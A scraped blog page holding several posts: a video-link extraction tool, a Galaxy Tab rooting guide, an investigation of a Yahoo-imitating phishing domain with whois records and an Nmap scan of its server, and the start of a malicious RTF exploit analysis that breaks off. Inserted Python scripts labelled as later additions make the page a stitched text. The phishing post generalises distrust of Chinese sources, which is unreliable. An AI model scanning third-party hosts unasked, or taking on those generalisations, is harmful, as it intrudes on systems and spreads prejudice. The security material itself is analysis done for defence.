<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBCQ3KEEbnqIDdRZje-IYQo95KyPPzMLv80kJm7lupyOB1AoaZrMEXXWsPEW4Hi7hVfXpLDTAmBmK9BLjkhJVs2TndqjBo9Do28rrWoHfRBoxxkc3NyKchP5rVT-CDj9lA9CA4vkGO5B8/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBCQ3KEEbnqIDdRZje-IYQo95KyPPzMLv80kJm7lupyOB1AoaZrMEXXWsPEW4Hi7hVfXpLDTAmBmK9BLjkhJVs2TndqjBo9Do28rrWoHfRBoxxkc3NyKchP5rVT-CDj9lA9CA4vkGO5B8/s400/5.png" width="400" /></a></div>
<center>
SAMPLE IMAGE!</center>
<br />
<span style="text-decoration: underline;"><strong>What is this software?</strong></span><br />
<br />
This software is named Antap v1.0 (Alpha). Basically, this small program tries to retrieve the Youtube link from certain websites that require you to click a 'Share' or 'Like' link before you can watch the video.<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>Why is this software needed?</strong></span><br />
<br />
Some users may not be interested in using certain web services that require you to press a 'Share' or 'Like' button before you can watch your favourite video. Some of these websites use this technique only to inflate their visitor counts at random.<br />
<br />
Basically, all of these videos are already hosted on Youtube.com. Most of these 3rd-party websites are designed to gain user numbers from random 'Like' or 'Share' clicks by users.<br />
<br />
Some users will find this very annoying. The following are among the websites used:<br />
<br />
1. www.melayu.tv<br />
2. www.melayutv.info<br />
3. www.melayutv.com<br />
4. www.melayutv.org<br />
5. www.dailymotion.com (Bypasses the Digg Facebook App)<br />
6. www.digg.com (Bypasses the Digg Facebook App)<br />
7. www.zapkolik.com (Bypasses the Zapkolik Facebook App)<br />
8. or a link copied from Facebook.<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>How do you use it?</strong></span><br />
<br />
Follow these simple steps:<br />
<br />
1. <a href="http://data0net-tools.googlecode.com/files/Antap.zip" target="_blank" title="Download here!">Download this software</a>. (This software requires .Net Framework 2.0 to run - <a href="http://www.microsoft.com/download/en/details.aspx?id=19" target="_blank" title="Download Microsoft .Net Framework 2.0 here!">Click here if you don't have it yet</a>)<br />
<br />
2. Run the software directly. See the image below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeEBzOaglzg9lo-NFuMfFTxJ6gvauNpFfp0h-_hbE3oXy-5mkWIRdz0Sz3qknNqcMnO0xKwuTmohy5K-xVT_PjGAB1UtVtDojsoLg-9tNS-Hyf8DKHxrjHyHSqx1xwu1dJqMyzvqNITOg/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="133" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeEBzOaglzg9lo-NFuMfFTxJ6gvauNpFfp0h-_hbE3oXy-5mkWIRdz0Sz3qknNqcMnO0xKwuTmohy5K-xVT_PjGAB1UtVtDojsoLg-9tNS-Hyf8DKHxrjHyHSqx1xwu1dJqMyzvqNITOg/s400/1.png" width="400" /></a></div>
<br />
<br />
3. Get the URL of the video you want to watch. Copy and paste it into the Antap program. See the example image below:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA0s0l0KxfBh95WthMsKBhnWLIfxDIqJ9ck7KVx_HGe98xhIt1PI9RPH4XK5tVqUhRTV8oGnqotk5ixQTdAQ_lj_aBqSLBMH_GIyPDpREb7BxvjnvUfwVfy_WYIoz7HfE8s3Z5ssG2lQI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA0s0l0KxfBh95WthMsKBhnWLIfxDIqJ9ck7KVx_HGe98xhIt1PI9RPH4XK5tVqUhRTV8oGnqotk5ixQTdAQ_lj_aBqSLBMH_GIyPDpREb7BxvjnvUfwVfy_WYIoz7HfE8s3Z5ssG2lQI/s400/2.png" width="400" /></a></div>
<br />
<br />
OR<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi20Ex-8nbtXobk-MezeyXwdN4L1zrOQz7yxv3ZnrS80dHZLIVESKWj0TYS9XCCUOuArjF8CzcD68zs6VrnHdVaPq04OQp31q5SL8lVxxSCWV6K-V9R0yFXC19q-m0mNw7h6jtX6ZU-D6g/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi20Ex-8nbtXobk-MezeyXwdN4L1zrOQz7yxv3ZnrS80dHZLIVESKWj0TYS9XCCUOuArjF8CzcD68zs6VrnHdVaPq04OQp31q5SL8lVxxSCWV6K-V9R0yFXC19q-m0mNw7h6jtX6ZU-D6g/s400/3.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
4. Then click the GO! button and the Youtube link will be displayed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidgHbtZGqzWOTk55zH3CMKCYXlEJCx5P6EHCaxI9kZFby6Y81znU6rtX-gYCp5QATjtopEoWIK-_KQaamJqQU5Y8V4C8N4s10pc4b3FgRmv01onzATPOinPc6oQUBnXPMagesuSgGSNz0/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidgHbtZGqzWOTk55zH3CMKCYXlEJCx5P6EHCaxI9kZFby6Y81znU6rtX-gYCp5QATjtopEoWIK-_KQaamJqQU5Y8V4C8N4s10pc4b3FgRmv01onzATPOinPc6oQUBnXPMagesuSgGSNz0/s400/4.png" width="400" /></a></div>
<br />
<br />
5. So, just click on the Youtube link to watch. Happy trying!<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>Download</strong></span><br />
<br />
<a href="http://data0net-tools.googlecode.com/files/Antap.zip" target="_blank" title="Download Here la!">Click here to download</a>.<br />
<br />
<strong>NOTE</strong>: This software does not contain any virus or suspicious code. You can also scan it with your antivirus software to see for yourself.<br />
<br />
<br />
<br />
<span style="text-decoration: underline;"><strong>The web version can be accessed here</strong></span><br />
<br />
<a href="http://www.data0.net/antap.php">http://www.data0.net/antap.php</a>Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-2797284762054001698.post-61579368924357925342012-01-04T00:57:00.000+08:002012-08-09T11:35:51.299+08:00Root: Samsung Galaxy Tab 8.9 GT-P7300I just bought a new Samsung Galaxy Tab 8.9 P7300. Well, there are a lot of cool things we can do besides playing games, social networks, notes or other entertainment. Some of you, probably software developers, might want more 'fun' with it. But with factory settings there is not much we can do; you can't even run software as simple as a phone call app or access a few special commands on the terminal console. So, before we start, read the following:<br />
<br />
<span style="color: #ff9900;"><strong>Warning: Please make sure you have a backup copy of your firmware.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: Please make sure you back up all your important data.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: Your warranty may be voided by doing this process.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: It is recommended to install the SuperUser app so you are prompted for permission when launching an app with root privileges.</strong></span><br />
<span style="color: #ff9900;"><strong>Warning: I did this on a Samsung Galaxy Tab 8.9 P7300 + Android 3.1 (Honeycomb) ONLY. Not yet tried on other devices.</strong></span><br />
<strong><span style="color: #3366ff;">Disclaimer: The author of this write-up does not take any responsibility for any damage caused by this action.</span></strong><br />
<br />
<span style="text-decoration: underline;">Follow step by step below:</span><br />
<br />
1. First of all, download this file package. Download here >> <a href="http://data0net-tools.googlecode.com/files/root_2.zip">root_2.zip</a>.<br />
<br />
2. Put the root_2.zip into the root directory (No need to extract).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKgK_WSpRpfnTJEn93ZA9em9etFVOMcfBhUTfhQo-aIlhS6z8IrVjbVYa_OogR-msTBPFDsyDfy07DBhNYqU8RgbuRLyiNubbWNHy1bl8Fgv9QHGNWggD0iHQOfl0beJwm4JM1EB1OnY/s1600/1n.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKgK_WSpRpfnTJEn93ZA9em9etFVOMcfBhUTfhQo-aIlhS6z8IrVjbVYa_OogR-msTBPFDsyDfy07DBhNYqU8RgbuRLyiNubbWNHy1bl8Fgv9QHGNWggD0iHQOfl0beJwm4JM1EB1OnY/s400/1n.png" width="400" /></a></div>
<center>
</center>
3. Turn OFF your device.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwQp_NEjeCF9YhzqdfxkxzsezE2geb8QH94aSbYB8TAFb1Ig-vjLW8ZoxcVgT2N9acUjqEQqLaxc3Z2dFY96yveqzJ0Sllx_BnMb1VDsd0ozVFpoFu_98Kf0O-AWHIRDx0wdrWNqEW_YU/s1600/SC20120103-145031b1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwQp_NEjeCF9YhzqdfxkxzsezE2geb8QH94aSbYB8TAFb1Ig-vjLW8ZoxcVgT2N9acUjqEQqLaxc3Z2dFY96yveqzJ0Sllx_BnMb1VDsd0ozVFpoFu_98Kf0O-AWHIRDx0wdrWNqEW_YU/s400/SC20120103-145031b1.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<center>
</center>
4. Turn the device ON by holding the Power and Volume Down buttons together. Repeat this if it does not work the first time.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8EzOzJGMVV5f7WKd-ExKsasYOgANc_6bN22MEdbpfxcfNyjd_AfQwSbCF2bfAnaEicQqetgI7SIbkneu_evSpyWw5ImJhaFtCZ5jhDy3kqvo8fSW-fTJ2mLTbfOHQUORVr9QHkBSZik/s1600/020120120262.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR8EzOzJGMVV5f7WKd-ExKsasYOgANc_6bN22MEdbpfxcfNyjd_AfQwSbCF2bfAnaEicQqetgI7SIbkneu_evSpyWw5ImJhaFtCZ5jhDy3kqvo8fSW-fTJ2mLTbfOHQUORVr9QHkBSZik/s400/020120120262.jpg" width="400" /></a></div>
<center>
</center>
5. If successful, two icons appear on the screen: Recovery Mode and Download Mode (see the picture above).<br />
<br />
6. Select Recovery Mode (on the left) with the Volume Down button, then press Volume Up to confirm.<br />
<br />
7. Select 'apply update from /sdcard' using the Volume Up/Down buttons, make sure you pick root_2.zip from the root of the storage, then press the Power button to confirm.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC_Fj-c0blu6I4lnb1qXne5QqYZQrI4P1z29CSEimasPr3tztEqyZzxD6bpKdpSCIqPoauBfVddN1I6_GEg_c2BTkL4M52cOj0sweYhysceNsO0_8dmxXHnEw7WqRanl3AVTtmuLvtTPk/s1600/Recovery-Mode.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="243" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC_Fj-c0blu6I4lnb1qXne5QqYZQrI4P1z29CSEimasPr3tztEqyZzxD6bpKdpSCIqPoauBfVddN1I6_GEg_c2BTkL4M52cOj0sweYhysceNsO0_8dmxXHnEw7WqRanl3AVTtmuLvtTPk/s400/Recovery-Mode.jpg" width="400" /></a></div>
<center>
</center>
8. An 'Install from sdcard complete' message appears if the update was applied successfully.<br />
<br />
9. Choose 'reboot system now' to restart the device. It should now be rooted.<br />
<br />
10. To verify that the device is rooted, open a terminal emulator, type 'su' and press ENTER, then type 'id' and press ENTER. The user id should now be 'root' (uid=0), as shown in the image below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9f1l83Zl2OC0KuUoCPOfcaGEbbiLG5qZYYNkR-o0w9TFew2L5g-SLEGdlLXo7AexQsJZ6j6-bQPRqlSYUSYRT8TWHrKLFuyaP1SR4f6sXucbzzqsJ2zWPGRBmr675pPBmnhaCnkcZF8/s1600/SC20120103-155715b.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr9f1l83Zl2OC0KuUoCPOfcaGEbbiLG5qZYYNkR-o0w9TFew2L5g-SLEGdlLXo7AexQsJZ6j6-bQPRqlSYUSYRT8TWHrKLFuyaP1SR4f6sXucbzzqsJ2zWPGRBmr675pPBmnhaCnkcZF8/s400/SC20120103-155715b.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<center>
</center>
At this point any application that needs elevated access can be installed and run with root privileges, for example VPNC Widget, Samba Filesharing, Superuser and so on. Have a nice day.<br />
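One check worth doing before step 7: an update zip applied from recovery runs with full control of /system, so it is worth reading what it will write before flashing it. The script below is an added example and is not part of this post; it knows nothing about the real contents of root_2.zip. It builds a constructed stand-in zip in memory with a typical Edify updater-script of the kind root packages of that era used (a su binary plus Superuser.apk, assumed paths), then lists every call that writes files, deletes, formats or sets permissions, flags anything made setuid/setgid, and checks that every file the script extracts actually exists in the archive.

```python
"""Pre-flight inspection of an Android recovery update zip.

Added example for the rooting procedure above; it is not part of the
original post and knows nothing about what root_2.zip actually contains.
The sample zip below is CONSTRUCTED in memory with an Edify updater-script
of the kind root packages of that era used (su binary plus Superuser.apk);
its paths and partition name are assumptions.
"""
import io
import re
import zipfile

UPDATE_BINARY = "META-INF/com/google/android/update-binary"
UPDATER_SCRIPT = "META-INF/com/google/android/updater-script"

# Edify calls that write to the device, remove data or change permissions.
WRITE_CALLS = re.compile(
    r"(package_extract_file|package_extract_dir|set_perm_recursive|set_perm|"
    r"delete_recursive|delete|format|symlink)\s*\(([^;]*)\)\s*;", re.S)


def build_sample_zip():
    """Constructed stand-in for root_2.zip (NOT the real package)."""
    script = (
        'ui_print("Installing su...");\n'
        'mount("ext4", "EMMC", "/dev/block/mmcblk0p24", "/system");\n'
        'package_extract_file("system/bin/su", "/system/bin/su");\n'
        'set_perm(0, 0, 06755, "/system/bin/su");\n'
        'package_extract_file("system/app/Superuser.apk", "/system/app/Superuser.apk");\n'
        'set_perm(0, 0, 0644, "/system/app/Superuser.apk");\n'
        'unmount("/system");\n')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(UPDATE_BINARY, b"\x7fELF placeholder")   # fake update-binary
        zf.writestr(UPDATER_SCRIPT, script)
        zf.writestr("system/bin/su", b"\x7fELF placeholder")
        zf.writestr("system/app/Superuser.apk", b"PK placeholder")
    return buf.getvalue()


def inspect_update_zip(data):
    """Report members, every write-type Edify call, files that end up
    setuid/setgid (mode with the 04000/02000 bits) and structural problems."""
    report = {"members": [], "calls": [], "setuid": [], "problems": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        report["members"] = zf.namelist()
        if UPDATE_BINARY not in report["members"]:
            report["problems"].append("missing " + UPDATE_BINARY)
        if UPDATER_SCRIPT not in report["members"]:
            report["problems"].append("missing " + UPDATER_SCRIPT)
            return report
        script = zf.read(UPDATER_SCRIPT).decode("utf-8", "replace")
    for func, args in WRITE_CALLS.findall(script):
        argv = [a.strip().strip('"') for a in args.split(",")]
        report["calls"].append((func, argv))
        # set_perm(uid, gid, mode, path...) / set_perm_recursive(uid, gid, dirmode, filemode, path...)
        if func == "set_perm" and int(argv[2], 8) & 0o6000:
            report["setuid"].extend(argv[3:])
        elif func == "set_perm_recursive" and (int(argv[2], 8) | int(argv[3], 8)) & 0o6000:
            report["setuid"].extend(argv[4:])
    # Every file the script extracts must actually be in the archive.
    for func, argv in report["calls"]:
        if func == "package_extract_file" and argv[0] not in report["members"]:
            report["problems"].append("script extracts missing member " + argv[0])
    return report


if __name__ == "__main__":
    rep = inspect_update_zip(build_sample_zip())
    for func, argv in rep["calls"]:
        print(f"{func}({', '.join(argv)})")
    print("setuid/setgid files:", rep["setuid"])
    print("problems:", rep["problems"] or "none")
```

Run it against the real zip with `inspect_update_zip(open("root_2.zip", "rb").read())`; a root package is expected to install exactly one setuid binary (su), so anything else in the setuid list, or writes outside /system, deserves a second look before you flash.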
<br />
<span style="text-decoration: underline;"><strong>UPDATE (09/01/2012):</strong></span><br />
<br />
Two more devices belonging to a friend of mine, a Samsung Galaxy Tab 7.0+ and a Samsung Galaxy Tab 10.1, also seem to work with these steps.<br />
<br />
<h3>
Another Chinese Internet Fraud (yhoo-it.com)</h3>
<br />
Published 2011-12-31 (updated 2012-08-09).<br />
<br />
While I was watching the movie 'The Pacific' I suddenly got a Yahoo Messenger popup message from an old friend (who passed away in August 2009). This was interesting and quite a surprise, seeing my very close friend suddenly 'wake up' from his long rest. I had been monitoring this scammer for a few months, since first being surprised by his online status. Check out the chat in the web browser YM client:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwlSgaZ_-pB7MyC_06gPVAL1_ON6-5I2mLtdoeEmq-H_BVrZaV9RMLhMcVLUid2TOYhqU7HTVKAh36Z_s9rORFFLEkJ8gUyOrpouz16_h_h1Z_GC2cpNcqobRfua1JTSQVed453HDT3Sc/s1600/15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwlSgaZ_-pB7MyC_06gPVAL1_ON6-5I2mLtdoeEmq-H_BVrZaV9RMLhMcVLUid2TOYhqU7HTVKAh36Z_s9rORFFLEkJ8gUyOrpouz16_h_h1Z_GC2cpNcqobRfua1JTSQVed453HDT3Sc/s400/15.png" width="400" /></a></div>
<center>
</center>
<br />
The shortened URL in the message redirects the user to the following URL:<br />
<br />
http://yhoo-it.com/?id=4ccda25f27843014&s=1&user=matkamil2000<br />
<br />
The URL appears to have already expired, but it will probably reappear soon. The actual site presents some kind of money offer that asks the user to enter their user name and email.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWYUwXUn1J4C8iExnek8yGoyt1B2FbIrMuSGAekzLtI-aoo2d8WQURxkOopdXxcRL6LdQrD5juc82uSiWyzpHmHI6NwcjurZquvnhINCyrA3AeHuj-uL93WcyMiXvaQQZx2tdCyDmC3DM/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWYUwXUn1J4C8iExnek8yGoyt1B2FbIrMuSGAekzLtI-aoo2d8WQURxkOopdXxcRL6LdQrD5juc82uSiWyzpHmHI6NwcjurZquvnhINCyrA3AeHuj-uL93WcyMiXvaQQZx2tdCyDmC3DM/s400/2.jpg" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<center>
</center>
Let's take a closer look at the URL. The domain name is chosen to fool the user into thinking it comes from Yahoo. Based on the whois information the domain was registered from China. Obviously.<br />
<blockquote>
Registration Service Provided By: Bizcn.com<br />
Website: http://www.bizcn.com<br />
Whois Server: whois.bizcn.com<br />
<br />
Domain name: yhoo-it.com<br />
<br />
Registrant Contact:<br />
zhang yu<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
Administrative Contact:<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
Technical Contact:<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
Billing Contact:<br />
yu zhang sdfgsdfghf@msn.com<br />
0463965823 fax: 0463965823<br />
changhailu12hao<br />
nanning guangxi 230254<br />
cn<br />
<br />
DNS:<br />
ns7.cnmsn.net<br />
ns8.cnmsn.net<br />
<br />
Created: 2011-12-04<br />
Expires: 2012-12-04</blockquote>
<br />
The domain was newly registered, at exactly the time I started monitoring it. It points to two name servers, ns7.cnmsn.net and ns8.cnmsn.net, whose domain was also registered from China.<br />
<blockquote>
Registration Service Provided By: Bizcn.com<br />
Website: http://www.bizcn.com<br />
Whois Server: whois.bizcn.com<br />
<br />
Domain name: cnmsn.net<br />
<br />
Registrant Contact:<br />
XiaMen Longtop Online Technology Co.,Ltd<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
Administrative Contact:<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
Technical Contact:<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
Billing Contact:<br />
huiping yi hpyi@longtoponline.com<br />
+865922577888 fax: +865922577111<br />
61, WangHai Road, Longtop Group Building, Xiamen Software Park<br />
xiamen fujian 361008<br />
cn<br />
<br />
DNS:<br />
dns.bizcn.com<br />
dns.cnmsn.net<br />
ns5.cnmsn.net<br />
ns6.cnmsn.net<br />
ns1.4everdns.com<br />
ns2.4everdns.com<br />
<br />
Created: 2003-08-08<br />
Expires: 2015-02-27</blockquote>
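The two signals above, a brand look-alike domain and a registration date only days old, are easy to automate. The script below is an added example, not part of this post: it takes the URL from the message, measures the domain's edit distance from a small watch list of brand names (the list and the 30-day threshold are assumptions chosen for illustration), and reads the Created date out of the whois text quoted above to compute the domain's age on the day of the post.

```python
"""Triage of a suspicious link: brand look-alike check on the domain name
and domain age from whois text.

Added example, not part of the original post. The whois excerpt is taken
from the record quoted above for yhoo-it.com; the brand watch list and
the 30-day "newly registered" threshold are assumptions."""
import re
from datetime import date
from urllib.parse import urlparse

BRANDS = ["yahoo", "google", "facebook", "paypal"]   # assumed watch list
NEW_DOMAIN_DAYS = 30                                  # assumed threshold

# Excerpt of the whois record quoted in the post.
WHOIS_YHOO_IT = """Domain name: yhoo-it.com
Registrant Contact:
zhang yu
nanning guangxi 230254
cn
DNS:
ns7.cnmsn.net
ns8.cnmsn.net
Created: 2011-12-04
Expires: 2012-12-04
"""


def edit_distance(a, b):
    """Levenshtein distance, classic dynamic-programming version."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_domain(url):
    """Host label just below the TLD; good enough for .com/.net style names."""
    host = (urlparse(url).hostname or "").lower()
    labels = host.split(".")
    return labels[-2] if len(labels) >= 2 else host


def lookalike_brand(name, brands=BRANDS, max_distance=2):
    """Return the brand the name imitates, or None for an exact or unrelated name.

    Hyphen/digit-separated tokens are compared separately, so 'yhoo-it'
    is measured against 'yahoo' as 'yhoo' (distance 1)."""
    tokens = re.split(r"[-_0-9]+", name)
    best = None
    for brand in brands:
        for tok in tokens + [name]:
            d = edit_distance(tok, brand)
            if 0 < d <= max_distance and (best is None or d < best[1]):
                best = (brand, d)
    return best[0] if best else None


def domain_age_days(whois_text, today_iso):
    m = re.search(r"^Created:\s*(\d{4})-(\d{2})-(\d{2})", whois_text, re.M)
    if not m:
        return None
    created = date(*map(int, m.groups()))
    return (date.fromisoformat(today_iso) - created).days


def triage(url, whois_text, today_iso):
    name = registrable_domain(url)
    age = domain_age_days(whois_text, today_iso)
    return {"domain": name,
            "lookalike_of": lookalike_brand(name),
            "age_days": age,
            "newly_registered": age is not None and age < NEW_DOMAIN_DAYS}


if __name__ == "__main__":
    # "today" is the date of the original post.
    print(triage("http://yhoo-it.com/?id=4ccda25f27843014&s=1&user=matkamil2000",
                 WHOIS_YHOO_IT, "2011-12-31"))
```

For yhoo-it.com this reports a look-alike of yahoo at distance 1 and an age of 27 days, both strong phishing signals on their own. Real deployments should replace the TLD heuristic with a public-suffix list and feed whois output from a live lookup.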
<br />
Well, let's dig some more.<br />
<blockquote>
Nmap scan report for yhoo-it.com (109.230.222.53)<br />
Host is up (0.29s latency).<br />
rDNS record for 109.230.222.53: hosted.by.xsserver.eu<br />
Not shown: 986 closed ports<br />
PORT STATE SERVICE VERSION<br />
25/tcp filtered smtp<br />
80/tcp open http nginx 1.0.4<br />
|_http-title: Site doesn't have a title (text/html).<br />
|_http-methods: No Allow or Public header in OPTIONS response (status code 405)<br />
111/tcp open rpcbind 2 (rpc #100000)<br />
135/tcp filtered msrpc<br />
139/tcp filtered netbios-ssn<br />
443/tcp open ssh OpenSSH 5.5p1 Debian 6 (protocol 2.0)<br />
| ssh-hostkey: 1024 6e:96:96:b1:aa:4b:e2:1a:e5:9f:35:9c:6a:79:af:df (DSA)<br />
|_2048 48:bb:c1:d4:bf:08:4d:c6:41:30:ea:57:3e:eb:fe:19 (RSA)<br />
445/tcp filtered microsoft-ds<br />
593/tcp filtered http-rpc-epmap<br />
1026/tcp filtered LSA-or-nterm<br />
1027/tcp filtered IIS<br />
4444/tcp filtered krb524<br />
5432/tcp open postgresql PostgreSQL DB 8.4.1 - 8.4.4<br />
6129/tcp filtered unknown<br />
6580/tcp open parsec-master?<br />
Device type: general purpose|WAP|router<br />
Running (JUST GUESSING): Linux 2.6.X|2.4.X (95%), Linksys Linux 2.4.X (92%), Netgear embedded (92%), D-Link embedded (92%), Linksys embedded (92%), Peplink embedded (92%)<br />
, Asus Linux 2.6.X (91%)<br />
Aggressive OS guesses: Linux 2.6.23 - 2.6.33 (95%), Linux 2.6.35 (94%), Linux 2.6.31 (94%), Linux 2.6.32 (94%), Linux 2.6.22 (94%), OpenWrt White Russian 0.9 (Linux 2.4.3<br />
0) (92%), Linux 2.6.18 - 2.6.27 (92%), Linux 2.6.31 - 2.6.34 (92%), Linux 2.6.34 (92%), Netgear DG834G WAP (92%)<br />
No exact OS matches for host (test conditions non-ideal).<br />
Network Distance: 9 hops<br />
Service Info: OS: Linux<br />
<br />
TRACEROUTE (using port 23/tcp)<br />
HOP RTT ADDRESS<br />
1 12.00 ms 60.53.173.202<br />
2 16.00 ms 60.53.173.213<br />
3 16.00 ms 60.53.173.213<br />
4 228.00 ms 10.55.192.38<br />
5 229.00 ms 10gigabitethernet1-3.core1.lax1.he.net (206.223.123.37)<br />
6 290.00 ms 10gigabitethernet4-3.core1.nyc4.he.net (72.52.92.225)<br />
7 333.00 ms 10gigabitethernet1-2.core1.lon1.he.net (72.52.92.242)<br />
8 399.00 ms 10gigabitethernet4-2.core1.fra1.he.net (184.105.213.146)<br />
9 290.00 ms hosted.by.xsserver.eu (109.230.222.53)</blockquote>
<br />
Since I don't trust any source from China, not even their web hosting provider, I ran an Nmap scan to see what the host has. The server is running Linux with several service ports open. Note that the rDNS name (hosted.by.xsserver.eu) and the traceroute, which passes through Hurricane Electric's Frankfurt core (fra1) before reaching the host, indicate the web server itself is hosted in Europe rather than China, and that 443/tcp is serving SSH rather than HTTPS.<br />
<br />
The Yahoo Messenger online status comes from the expired phone number, which was probably taken over by a Chinese scammer living in Malaysia. Malaysia is a multicultural country and it is not impossible for someone from China to pass as a Malaysian Chinese. Alternatively, the YM account may have been stolen from his machine through a malware infection.<br />
<br />
More updates coming soon.<br />
<br />
<h3>
MS Word Document (CVE-2010-3333) Exploit</h3>
<br />
Published 2011-12-06 (updated 2012-08-09).<br />
<br />
A week ago, while checking for new email, I received a message with an MS Word document attached, delivered to my inbox (not the spam folder). That made me curious to find out what it was, so let's take a closer look. I renamed the Word document to 'gigi.doc'; the .doc file is 160,192 bytes long.<br />
<br />
Despite the extension, the .doc file is in Rich Text Format (RTF). Inside it we can see a long run of 0x41 ('A') bytes used as a slide (padding) before the actual shellcode, which sits within the padding. The images below show the location of the exploit code in hex:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7_Iu4PecWP7YQJ5InTGZymjO_1O0XtkwGltGaBCTUZSr-HlcnGCNZEx01GDRl5jT2la76K2lyV5JZfRyQzmH0WLD7WrEcEQsYMiBuHE-exJiGPow8na_LsENTbA0YaBbqU6DdyGG0Lw/s1600/21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhd7_Iu4PecWP7YQJ5InTGZymjO_1O0XtkwGltGaBCTUZSr-HlcnGCNZEx01GDRl5jT2la76K2lyV5JZfRyQzmH0WLD7WrEcEQsYMiBuHE-exJiGPow8na_LsENTbA0YaBbqU6DdyGG0Lw/s400/21.png" width="400" /></a></div>
<div style="text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
